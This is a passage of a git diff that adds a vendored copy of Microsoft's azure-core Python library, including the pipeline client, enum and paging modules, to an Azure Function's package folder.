/dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/__pycache__/typing_extensions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/_cffi_backend.cpython-39-x86_64-linux-gnu.so b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/_cffi_backend.cpython-39-x86_64-linux-gnu.so new file mode 100644 index 0000000..5f69b7e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/_cffi_backend.cpython-39-x86_64-linux-gnu.so differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__init__.py new file mode 100644 index 0000000..8b77634 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__init__.py @@ -0,0 +1,45 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +from ._version import VERSION +__version__ = VERSION + +from ._pipeline_client import PipelineClient +from ._match_conditions import MatchConditions +from ._enum_meta import CaseInsensitiveEnumMeta + + +__all__ = [ + "PipelineClient", + "MatchConditions", + "CaseInsensitiveEnumMeta", +] + +try: + from ._pipeline_client_async import AsyncPipelineClient #pylint: disable=unused-import + __all__.extend(["AsyncPipelineClient"]) +except (ImportError, SyntaxError): # Python <= 3.5 + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..1c170ae Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_enum_meta.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_enum_meta.cpython-39.pyc new file mode 100644 index 0000000..1ace773 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_enum_meta.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_match_conditions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_match_conditions.cpython-39.pyc new file mode 100644 index 0000000..ce0fb39 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_match_conditions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_pipeline_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_pipeline_client.cpython-39.pyc new file mode 100644 index 0000000..14e8e94 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_pipeline_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_pipeline_client_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_pipeline_client_async.cpython-39.pyc new file mode 100644 index 0000000..cb2aa60 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_pipeline_client_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_version.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_version.cpython-39.pyc new file mode 100644 index 0000000..5757e18 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_version.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/async_paging.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/async_paging.cpython-39.pyc new file mode 100644 index 0000000..e8c47b2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/async_paging.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/configuration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/configuration.cpython-39.pyc new file mode 100644 index 0000000..61668ad Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/configuration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/credentials.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/credentials.cpython-39.pyc new file mode 100644 index 0000000..6fea076 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/credentials.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/credentials_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/credentials_async.cpython-39.pyc new file mode 100644 index 0000000..522f448 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/credentials_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..0dc0d01 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/messaging.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/messaging.cpython-39.pyc new file mode 100644 index 0000000..325989d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/messaging.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/paging.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/paging.cpython-39.pyc new file mode 100644 index 0000000..927ee73 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/paging.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/serialization.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/serialization.cpython-39.pyc new file mode 100644 index 0000000..99b861a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/serialization.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/settings.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/settings.cpython-39.pyc new file mode 100644 index 0000000..b7e2522 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/settings.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_enum_meta.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_enum_meta.py new file mode 100644 index 0000000..051ce4e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_enum_meta.py @@ -0,0 +1,61 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +from enum import EnumMeta + + +class CaseInsensitiveEnumMeta(EnumMeta): + """Enum metaclass to allow for interoperability with case-insensitive strings. + + Consuming this metaclass in an SDK should be done in the following manner: + + .. code-block:: python + + from enum import Enum + from six import with_metaclass + from azure.core import CaseInsensitiveEnumMeta + + class MyCustomEnum(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + FOO = 'foo' + BAR = 'bar' + + """ + + def __getitem__(cls, name): + # disabling pylint bc of pylint bug https://github.com/PyCQA/astroid/issues/713 + return super(CaseInsensitiveEnumMeta, cls).__getitem__(name.upper()) # pylint: disable=no-value-for-parameter + + def __getattr__(cls, name): + """Return the enum member matching `name` + We use __getattr__ instead of descriptors or inserting into the enum + class' __dict__ in order to support `name` and `value` being both + properties for enum members (which live in the class' __dict__) and + enum members themselves. + """ + try: + return cls._member_map_[name.upper()] + except KeyError: + raise AttributeError(name) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_match_conditions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_match_conditions.py new file mode 100644 index 0000000..fe7fc6b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_match_conditions.py @@ -0,0 +1,35 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +from enum import Enum + +class MatchConditions(Enum): + """An enum to describe match conditions. """ + Unconditionally = 1 + IfNotModified = 2 + IfModified = 3 + IfPresent = 4 + IfMissing = 5 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_pipeline_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_pipeline_client.py new file mode 100644 index 0000000..32ffb78 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_pipeline_client.py @@ -0,0 +1,195 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import logging +from collections.abc import Iterable +from .configuration import Configuration +from .pipeline import Pipeline +from .pipeline.transport._base import PipelineClientBase +from .pipeline.policies import ( + ContentDecodePolicy, + DistributedTracingPolicy, + HttpLoggingPolicy, + RequestIdPolicy, + RetryPolicy, +) + +try: + from typing import TYPE_CHECKING +except ImportError: + TYPE_CHECKING = False + +if TYPE_CHECKING: + from typing import ( + List, + Any, + Dict, + Union, + IO, + Tuple, + Optional, + Callable, + Iterator, + cast, + TypeVar + ) # pylint: disable=unused-import + HTTPResponseType = TypeVar("HTTPResponseType") + HTTPRequestType = TypeVar("HTTPRequestType") + +_LOGGER = logging.getLogger(__name__) + +class PipelineClient(PipelineClientBase): + """Service client core methods. + + Builds a Pipeline client. + + :param str base_url: URL for the request. + :keyword ~azure.core.configuration.Configuration config: If omitted, the standard configuration is used. + :keyword Pipeline pipeline: If omitted, a Pipeline object is created and returned. + :keyword list[HTTPPolicy] policies: If omitted, the standard policies of the configuration object is used. + :keyword per_call_policies: If specified, the policies will be added into the policy list before RetryPolicy + :paramtype per_call_policies: Union[HTTPPolicy, SansIOHTTPPolicy, list[HTTPPolicy], list[SansIOHTTPPolicy]] + :keyword per_retry_policies: If specified, the policies will be added into the policy list after RetryPolicy + :paramtype per_retry_policies: Union[HTTPPolicy, SansIOHTTPPolicy, list[HTTPPolicy], list[SansIOHTTPPolicy]] + :keyword HttpTransport transport: If omitted, RequestsTransport is used for synchronous transport. + :return: A pipeline object. + :rtype: ~azure.core.pipeline.Pipeline + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sync.py + :start-after: [START build_pipeline_client] + :end-before: [END build_pipeline_client] + :language: python + :dedent: 4 + :caption: Builds the pipeline client. + """ + + def __init__(self, base_url, **kwargs): + super(PipelineClient, self).__init__(base_url) + self._config = kwargs.pop("config", None) or Configuration(**kwargs) + self._base_url = base_url + if kwargs.get("pipeline"): + self._pipeline = kwargs["pipeline"] + else: + self._pipeline = self._build_pipeline(self._config, **kwargs) + + def __enter__(self): + self._pipeline.__enter__() + return self + + def __exit__(self, *exc_details): + self._pipeline.__exit__(*exc_details) + + def close(self): + self.__exit__() + + def _build_pipeline(self, config, **kwargs): # pylint: disable=no-self-use + transport = kwargs.get('transport') + policies = kwargs.get('policies') + per_call_policies = kwargs.get('per_call_policies', []) + per_retry_policies = kwargs.get('per_retry_policies', []) + + if policies is None: # [] is a valid policy list + policies = [ + RequestIdPolicy(**kwargs), + config.headers_policy, + config.user_agent_policy, + config.proxy_policy, + ContentDecodePolicy(**kwargs) + ] + if isinstance(per_call_policies, Iterable): + policies.extend(per_call_policies) + else: + policies.append(per_call_policies) + + policies.extend([config.redirect_policy, + config.retry_policy, + config.authentication_policy, + config.custom_hook_policy]) + if isinstance(per_retry_policies, Iterable): + policies.extend(per_retry_policies) + else: + policies.append(per_retry_policies) + + policies.extend([config.logging_policy, + DistributedTracingPolicy(**kwargs), + config.http_logging_policy or HttpLoggingPolicy(**kwargs)]) + else: + if isinstance(per_call_policies, Iterable): + per_call_policies_list = list(per_call_policies) + else: + per_call_policies_list = [per_call_policies] + per_call_policies_list.extend(policies) + policies = per_call_policies_list + + if isinstance(per_retry_policies, Iterable): + per_retry_policies_list = list(per_retry_policies) + else: + per_retry_policies_list = [per_retry_policies] + if len(per_retry_policies_list) > 0: + index_of_retry = -1 + for index, policy in enumerate(policies): + if isinstance(policy, RetryPolicy): + index_of_retry = index + if index_of_retry == -1: + raise ValueError("Failed to add per_retry_policies; " + "no RetryPolicy found in the supplied list of policies. ") + policies_1 = policies[:index_of_retry+1] + policies_2 = policies[index_of_retry+1:] + policies_1.extend(per_retry_policies_list) + policies_1.extend(policies_2) + policies = policies_1 + + if not transport: + from .pipeline.transport import RequestsTransport + transport = RequestsTransport(**kwargs) + + return Pipeline(transport, policies) + + + def send_request(self, request, **kwargs): + # type: (HTTPRequestType, Any) -> HTTPResponseType + """Method that runs the network request through the client's chained policies. + + >>> from azure.core.rest import HttpRequest + >>> request = HttpRequest('GET', 'http://www.example.com') + + >>> response = client.send_request(request) + + + :param request: The network request you want to make. Required. + :type request: ~azure.core.rest.HttpRequest + :keyword bool stream: Whether the response payload will be streamed. Defaults to False. + :return: The response of your network call. Does not do error handling on your response. + :rtype: ~azure.core.rest.HttpResponse + """ + stream = kwargs.pop("stream", False) # want to add default value + return_pipeline_response = kwargs.pop("_return_pipeline_response", False) + pipeline_response = self._pipeline.run(request, stream=stream, **kwargs) # pylint: disable=protected-access + if return_pipeline_response: + return pipeline_response + return pipeline_response.http_response diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_pipeline_client_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_pipeline_client_async.py new file mode 100644 index 0000000..815d06c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_pipeline_client_async.py @@ -0,0 +1,226 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import logging +import collections.abc +from typing import Any, Awaitable +from .configuration import Configuration +from .pipeline import AsyncPipeline +from .pipeline.transport._base import PipelineClientBase +from .pipeline.policies import ( + ContentDecodePolicy, + DistributedTracingPolicy, + HttpLoggingPolicy, + RequestIdPolicy, + AsyncRetryPolicy, +) + +try: + from typing import TYPE_CHECKING, TypeVar +except ImportError: + TYPE_CHECKING = False + +HTTPRequestType = TypeVar("HTTPRequestType") +AsyncHTTPResponseType = TypeVar("AsyncHTTPResponseType") + +if TYPE_CHECKING: + from typing import ( + List, + Dict, + Union, + IO, + Tuple, + Optional, + Callable, + Iterator, + cast, + ) # pylint: disable=unused-import + +_LOGGER = logging.getLogger(__name__) + +class _AsyncContextManager(collections.abc.Awaitable): + + def __init__(self, wrapped: collections.abc.Awaitable): + super().__init__() + self.wrapped = wrapped + self.response = None + + def __await__(self): + return self.wrapped.__await__() + + async def __aenter__(self): + self.response = await self + return self.response + + async def __aexit__(self, *args): + await self.response.__aexit__(*args) + + async def close(self): + await self.response.close() + + +class AsyncPipelineClient(PipelineClientBase): + """Service client core methods. + + Builds an AsyncPipeline client. + + :param str base_url: URL for the request. + :keyword ~azure.core.configuration.Configuration config: If omitted, the standard configuration is used. + :keyword Pipeline pipeline: If omitted, a Pipeline object is created and returned. + :keyword list[AsyncHTTPPolicy] policies: If omitted, the standard policies of the configuration object is used. + :keyword per_call_policies: If specified, the policies will be added into the policy list before RetryPolicy + :paramtype per_call_policies: Union[AsyncHTTPPolicy, SansIOHTTPPolicy, + list[AsyncHTTPPolicy], list[SansIOHTTPPolicy]] + :keyword per_retry_policies: If specified, the policies will be added into the policy list after RetryPolicy + :paramtype per_retry_policies: Union[AsyncHTTPPolicy, SansIOHTTPPolicy, + list[AsyncHTTPPolicy], list[SansIOHTTPPolicy]] + :keyword AsyncHttpTransport transport: If omitted, AioHttpTransport is used for asynchronous transport. + :return: An async pipeline object. + :rtype: ~azure.core.pipeline.AsyncPipeline + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_async.py + :start-after: [START build_async_pipeline_client] + :end-before: [END build_async_pipeline_client] + :language: python + :dedent: 4 + :caption: Builds the async pipeline client. + """ + + def __init__(self, base_url, **kwargs): + super(AsyncPipelineClient, self).__init__(base_url) + self._config = kwargs.pop("config", None) or Configuration(**kwargs) + self._base_url = base_url + if kwargs.get("pipeline"): + self._pipeline = kwargs["pipeline"] + else: + self._pipeline = self._build_pipeline(self._config, **kwargs) + + async def __aenter__(self): + await self._pipeline.__aenter__() + return self + + async def __aexit__(self, *args): + await self.close() + + async def close(self): + await self._pipeline.__aexit__() + + def _build_pipeline(self, config, **kwargs): # pylint: disable=no-self-use + transport = kwargs.get('transport') + policies = kwargs.get('policies') + per_call_policies = kwargs.get('per_call_policies', []) + per_retry_policies = kwargs.get('per_retry_policies', []) + + if policies is None: # [] is a valid policy list + policies = [ + RequestIdPolicy(**kwargs), + config.headers_policy, + config.user_agent_policy, + config.proxy_policy, + ContentDecodePolicy(**kwargs) + ] + if isinstance(per_call_policies, collections.abc.Iterable): + policies.extend(per_call_policies) + else: + policies.append(per_call_policies) + + policies.extend([config.redirect_policy, + config.retry_policy, + config.authentication_policy, + config.custom_hook_policy]) + if isinstance(per_retry_policies, collections.abc.Iterable): + policies.extend(per_retry_policies) + else: + policies.append(per_retry_policies) + + policies.extend([config.logging_policy, + DistributedTracingPolicy(**kwargs), + config.http_logging_policy or HttpLoggingPolicy(**kwargs)]) + else: + if isinstance(per_call_policies, collections.abc.Iterable): + per_call_policies_list = list(per_call_policies) + else: + per_call_policies_list = [per_call_policies] + per_call_policies_list.extend(policies) + policies = per_call_policies_list + if isinstance(per_retry_policies, collections.abc.Iterable): + per_retry_policies_list = list(per_retry_policies) + else: + per_retry_policies_list = [per_retry_policies] + if len(per_retry_policies_list) > 0: + index_of_retry = -1 + for index, policy in enumerate(policies): + if isinstance(policy, AsyncRetryPolicy): + index_of_retry = index + if index_of_retry == -1: + raise ValueError("Failed to add per_retry_policies; " + "no RetryPolicy found in the supplied list of policies. ") + policies_1 = policies[:index_of_retry + 1] + policies_2 = policies[index_of_retry + 1:] + policies_1.extend(per_retry_policies_list) + policies_1.extend(policies_2) + policies = policies_1 + + if not transport: + from .pipeline.transport import AioHttpTransport + transport = AioHttpTransport(**kwargs) + + return AsyncPipeline(transport, policies) + + async def _make_pipeline_call(self, request, **kwargs): + return_pipeline_response = kwargs.pop("_return_pipeline_response", False) + pipeline_response = await self._pipeline.run( + request, **kwargs # pylint: disable=protected-access + ) + if return_pipeline_response: + return pipeline_response + return pipeline_response.http_response + + def send_request( + self, + request: HTTPRequestType, + *, + stream: bool = False, + **kwargs: Any + ) -> Awaitable[AsyncHTTPResponseType]: + """Method that runs the network request through the client's chained policies. + + >>> from azure.core.rest import HttpRequest + >>> request = HttpRequest('GET', 'http://www.example.com') + + >>> response = await client.send_request(request) + + + :param request: The network request you want to make. Required. + :type request: ~azure.core.rest.HttpRequest + :keyword bool stream: Whether the response payload will be streamed. Defaults to False. + :return: The response of your network call. Does not do error handling on your response. + :rtype: ~azure.core.rest.AsyncHttpResponse + """ + wrapped = self._make_pipeline_call(request, stream=stream, **kwargs) + return _AsyncContextManager(wrapped=wrapped) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_version.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_version.py new file mode 100644 index 0000000..28480fe --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_version.py @@ -0,0 +1,12 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is +# regenerated. +# -------------------------------------------------------------------------- + +VERSION = "1.24.2" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/async_paging.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/async_paging.py new file mode 100644 index 0000000..2665a5c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/async_paging.py @@ -0,0 +1,163 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import collections.abc +import logging +from typing import ( + Iterable, + AsyncIterator, + TypeVar, + Callable, + Tuple, + Optional, + Awaitable, +) + +from .exceptions import AzureError + + +_LOGGER = logging.getLogger(__name__) + +ReturnType = TypeVar("ReturnType") +ResponseType = TypeVar("ResponseType") + +__all__ = [ + "AsyncPageIterator", + "AsyncItemPaged" +] + +class AsyncList(AsyncIterator[ReturnType]): + def __init__(self, iterable: Iterable[ReturnType]) -> None: + """Change an iterable into a fake async iterator. + + Coul be useful to fill the async iterator contract when you get a list. + + :param iterable: A sync iterable of T + """ + # Technically, if it's a real iterator, I don't need "iter" + # but that will cover iterable and list as well with no troubles created. + self._iterator = iter(iterable) + + async def __anext__(self) -> ReturnType: + try: + return next(self._iterator) + except StopIteration as err: + raise StopAsyncIteration() from err + + +class AsyncPageIterator(AsyncIterator[AsyncIterator[ReturnType]]): + def __init__( + self, + get_next: Callable[ + [Optional[str]], Awaitable[ResponseType] + ], + extract_data: Callable[ + [ResponseType], Awaitable[Tuple[str, AsyncIterator[ReturnType]]] + ], + continuation_token: Optional[str] = None, + ) -> None: + """Return an async iterator of pages. + + :param get_next: Callable that take the continuation token and return a HTTP response + :param extract_data: Callable that take an HTTP response and return a tuple continuation token, + list of ReturnType + :param str continuation_token: The continuation token needed by get_next + """ + self._get_next = get_next + self._extract_data = extract_data + self.continuation_token = continuation_token + self._did_a_call_already = False + self._response = None + self._current_page = None + + async def __anext__(self): + if self.continuation_token is None and self._did_a_call_already: + raise StopAsyncIteration("End of paging") + try: + self._response = await self._get_next(self.continuation_token) + except AzureError as error: + if not error.continuation_token: + error.continuation_token = self.continuation_token + raise + + self._did_a_call_already = True + + self.continuation_token, self._current_page = await self._extract_data( + self._response + ) + + # If current_page was a sync list, wrap it async-like + if isinstance(self._current_page, 